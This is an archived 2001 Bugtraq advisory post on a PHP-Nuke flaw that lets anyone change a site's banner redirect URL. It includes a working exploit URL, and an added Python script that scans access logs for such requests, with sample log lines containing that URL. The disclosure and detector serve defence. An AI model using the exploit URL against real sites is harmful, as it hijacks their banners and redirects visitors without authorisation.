[20005] in bugtraq


Php-nuke exploit...

daemon@ATHENA.MIT.EDU (Juan Diego)
Tue Apr 3 17:25:55 2001

MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID:  <Pine.LNX.4.21.0104021524430.21403-100000@krusty.linuxcolombia.com.co>
Date:         Mon, 2 Apr 2001 16:18:53 -0500
Reply-To: diego@LINUXCOLOMBIA.COM.CO
From: Juan Diego <diego@LINUXCOLOMBIA.COM.CO>
To: BUGTRAQ@SECURITYFOCUS.COM

Hi people...

This went public today... there is a bug in the banner section of
php-nuke (http://www.phpnuke.org) which is a web engine...

the problem is you can change the banners' url from anywhere, to anywhere

example, to change the url of the first banner you should enter in your
browser


http://target/banners.php?op=Change&bid=bannerid&url=http://where.to

if we want to change the banner number 1 to redir to www.you_are_redir we
write

http://www.foo.com/banners.php?op=Change&bid=1&url=http://you.are.redir

where www.foo.com is the server running php-nuke,

that's it...



Bye

Juan Diego
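
To check whether a site has already received the request described in this post, the added example below (not part of the original message) scans web-server access logs in Combined Log Format for requests to banners.php that carry op=Change and a url parameter. The log lines, client addresses and function name are constructed for illustration, and matching the op value case-insensitively is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip - user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)")?'
)

def find_banner_changes(lines, site_host):
    """Return one dict per logged request to banners.php with op=Change and a url value."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        target = urlsplit(m["target"])
        if not target.path.lower().endswith("/banners.php"):
            continue
        # parse_qs percent-decodes values; PHP keeps the last duplicate, so use [-1]
        q = parse_qs(target.query, keep_blank_values=True)
        if q.get("op", [""])[-1].lower() != "change" or "url" not in q:
            continue
        new_url = q["url"][-1]
        hits.append({
            "ip": m["ip"],
            "time": m["time"],
            "status": m["status"],
            "bid": q.get("bid", [""])[-1],
            "new_url": new_url,
            # banner now points at a host other than the site itself
            "offsite_target": urlsplit(new_url).hostname != site_host,
            # request did not come from a page on the site (typed URL, foreign link)
            "onsite_referer": urlsplit(m["referer"] or "").hostname == site_host,
        })
    return hits

# Constructed sample log lines (documentation address ranges, hosts from the post)
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Apr/2001:10:00:01 -0500] "GET /index.php HTTP/1.0" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [03/Apr/2001:10:02:13 -0500] "GET /banners.php?op=Change&bid=1&url=http://you.are.redir HTTP/1.0" 200 312 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [03/Apr/2001:10:05:40 -0500] "GET /banners.php?op=click&bid=1 HTTP/1.0" 302 0 "http://www.foo.com/index.php" "Mozilla/4.0"',
    '192.0.2.44 - - [03/Apr/2001:10:09:02 -0500] "GET /nuke/banners.php?op=change&bid=2&url=http%3A%2F%2Fwww.foo.com%2Fads HTTP/1.0" 200 312 "http://www.foo.com/admin.php" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for hit in find_banner_changes(SAMPLE_LOG, "www.foo.com"):
        print(hit)
```

Hits with an off-site target and no on-site referer are the ones to compare against the banner URLs currently stored for the site.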
